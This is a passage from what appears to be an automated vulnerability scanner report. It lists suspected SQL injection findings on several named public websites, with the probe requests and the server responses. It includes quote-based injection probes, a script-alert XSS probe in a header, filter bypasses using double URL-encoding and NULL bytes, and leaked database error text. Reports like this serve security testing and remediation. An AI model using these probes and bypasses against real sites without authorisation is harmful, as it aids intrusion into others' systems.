The database appears to be Oracle.

Request

GET /elephant/login.phtml' HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.1.10.1304319358; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:00:11 GMT
Server: lighttpd/1.4.28
Content-Length: 112217


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/first-impressions-moshidora-19325.phtml&mainnav=&track=featurebox" >
...[SNIP]...
1.15. http://www.japanator.com/elephant/signup.phtml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.japanator.com
Path:   /elephant/signup.phtml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Request

GET /elephant'/signup.phtml HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.3.10.1304319358

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:08:48 GMT
Server: lighttpd/1.4.28
Content-Length: 112262


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/first-impressions-moshidora-19325.phtml&mainnav=&track=featurebox" >
...[SNIP]...
1.16. http://www.japanator.com/elephant/signup.phtml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.japanator.com
Path:   /elephant/signup.phtml

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Request

GET /elephant/signup.phtml' HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.3.10.1304319358

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:09:11 GMT
Server: lighttpd/1.4.28
Content-Length: 112262


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/first-impressions-moshidora-19325.phtml&mainnav=&track=featurebox" >
...[SNIP]...
1.17. http://www.japanator.com/elephant/templates/features.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.japanator.com
Path:   /elephant/templates/features.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Request

GET /elephant'/templates/features.css?x=05.18.10a HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:56:53 GMT
Server: lighttpd/1.4.28
Content-Length: 112240


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/first-impressions-moshidora-19325.phtml&mainnav=&track=featurebox" >
...[SNIP]...
1.18. http://www.japanator.com/elephant/templates/features.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.japanator.com
Path:   /elephant/templates/features.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Request

GET /elephant/templates'/features.css?x=05.18.10a HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:57:16 GMT
Server: lighttpd/1.4.28
Content-Length: 112240


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/first-impressions-moshidora-19325.phtml&mainnav=&track=featurebox" >
...[SNIP]...
1.19. http://www.japanator.com/elephant/templates/features.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.japanator.com
Path:   /elephant/templates/features.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Request

GET /elephant/templates/features.css'?x=05.18.10a HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:57:41 GMT
Server: lighttpd/1.4.28
Content-Length: 112240


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/first-impressions-moshidora-19325.phtml&mainnav=&track=featurebox" >
...[SNIP]...
1.20. http://www.japanator.com/elephant/templates/styles2011.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.japanator.com
Path:   /elephant/templates/styles2011.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Request

GET /elephant'/templates/styles2011.css?x=05.18.10a HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:56:54 GMT
Server: lighttpd/1.4.28
Content-Length: 112242


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/first-impressions-moshidora-19325.phtml&mainnav=&track=featurebox" >
...[SNIP]...
1.21. http://www.japanator.com/elephant/templates/styles2011.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.japanator.com
Path:   /elephant/templates/styles2011.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Request

GET /elephant/templates'/styles2011.css?x=05.18.10a HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:57:18 GMT
Server: lighttpd/1.4.28
Content-Length: 112242


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/first-impressions-moshidora-19325.phtml&mainnav=&track=featurebox" >
...[SNIP]...
1.22. http://www.japanator.com/elephant/templates/styles2011.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.japanator.com
Path:   /elephant/templates/styles2011.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Request

GET /elephant/templates/styles2011.css'?x=05.18.10a HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:57:41 GMT
Server: lighttpd/1.4.28
Content-Length: 112242


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/first-impressions-moshidora-19325.phtml&mainnav=&track=featurebox" >
...[SNIP]...
1.23. http://www.japanator.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.japanator.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Request

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.japanator.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 00:15:05 GMT
Server: lighttpd/1.4.28
Content-Length: 112206


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/first-impressions-moshidora-19325.phtml&mainnav=&track=featurebox" >
...[SNIP]...
1.24. http://www.n1-models.com/favicon.ico [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.n1-models.com
Path:   /favicon.ico

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3%2527
Host: www.n1-models.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 1

HTTP/1.1 417 Expectation Failed
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 416
Date: Sun, 01 May 2011 23:39:26 GMT
X-Varnish: 1801237247
Age: 0
Via: 1.1 varnish
Cneonction: close
X-Served-By: tdd03.ds.lax1.oversee.net
X-Cache: MISS


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...
<h1>Error 417 Expectation Failed</h1>
...[SNIP]...

Request 2

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3%2527%2527
Host: www.n1-models.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 2

HTTP/1.1 302 (Found)
Location: http://spi.domainsponsor.com/skins/favicon/mi_favicon.ico
Server: Oversee Turing v1.0.0
Content-Length: 32
Content-Type: text/html

<html><body><br></body></html>
1.25. http://www.ourprayer.org/favicon.ico [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ourprayer.org
Path:   /favicon.ico

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3%00'
Host: www.ourprayer.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 1 (redirected)

HTTP/1.1 417 Expectation Failed
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:52:39 GMT
Content-Length: 5697

<%@ language="VBScript" %>
<%
Option Explicit

Const lngMaxFormBytes = 200

Dim objASPError, blnErrorWritten, strServername, strServerIP, strRemoteIP
Dim strMethod, lngPos, datNow, strQueryString, strURL

If Response.Buffer Then
Response.Clear
Response.Status = "500 Internal
...[SNIP]...

Request 2

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3%00''
Host: www.ourprayer.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 2

HTTP/1.1 417 Expectation Failed
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:52:40 GMT
Content-Length: 5697

<%@ language="VBScript" %>
<%
Option Explicit

Const lngMaxFormBytes = 200

Dim objASPError, blnErrorWritten, strServername, strServerIP, strRemoteIP
Dim strMethod, lngPos, datNow, strQ
...[SNIP]...
1.26. http://www.ourprayer.org/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ourprayer.org
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /favicon.ico?1%00'=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ourprayer.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 1 (redirected)

HTTP/1.1 302 Redirect
Content-Type: text/html; charset=UTF-8
Location: http://www.ourprayer.org/custerror.html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:52:06 GMT
Content-Length: 162
Set-Cookie: cookie1=4090937773.1.3717150784.2424965831; path=/

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://www.ourprayer.org/custerror.html">here</a></body>

Request 2

GET /favicon.ico?1%00''=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ourprayer.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 2

HTTP/1.1 417 Expectation Failed
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:52:09 GMT
Content-Length: 5697

<%@ language="VBScript" %>
<%
Option Explicit

Const lngMaxFormBytes = 200

Dim objASPError, blnErrorWritten, strServername, strServerIP, strRemoteIP
Dim strMethod, lngPos, datNow, strQ
...[SNIP]...
1.27. http://www.seoq.com/quotient/2011/04/22/1797/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/1797/N

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 5, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /quotient/2011/04/22/1797'/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:53:47 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53789


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and
' at line 1</span>
...[SNIP]...
1.28. http://www.seoq.com/quotient/2011/04/22/1797/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/1797/N

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /quotient/2011/04/22/1797/N' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response 1

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:15 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53610


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''N'' ORDER BY `report_date` DESC LIMIT 2' at line 2</span>
...[SNIP]...

Request 2

GET /quotient/2011/04/22/1797/N'' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response 2

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:15 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:16 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
1.29. http://www.seoq.com/quotient/2011/04/22/1798/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/1798/N

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 5, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /quotient/2011/04/22/1798'/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:52:17 GMT
Server: Apache
Set-Cookie: CAKEPHP=0kq9dnhc6fl22f9at88vsrcnr2; expires=Mon, 09-May-2011 02:52:17 GMT; path=/quotient
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53789


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and
' at line 1</span>
...[SNIP]...
1.30. http://www.seoq.com/quotient/2011/04/22/1798/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/1798/N

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /quotient/2011/04/22/1798/N' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response 1

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:53:05 GMT
Server: Apache
Set-Cookie: CAKEPHP=3pb6bi6fcls5vbnr5d5sj521t6; expires=Mon, 09-May-2011 02:53:06 GMT; path=/quotient
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53610


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''N'' ORDER BY `report_date` DESC LIMIT 2' at line 2</span>
...[SNIP]...

Request 2

GET /quotient/2011/04/22/1798/N'' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response 2

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:53:07 GMT
Server: Apache
Set-Cookie: CAKEPHP=vs6aum6e4b5h4nisto5to4o977; expires=Mon, 09-May-2011 02:53:07 GMT; path=/quotient
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=vs6aum6e4b5h4nisto5to4o977; expires=Mon, 09-May-2011 02:53:07 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46210

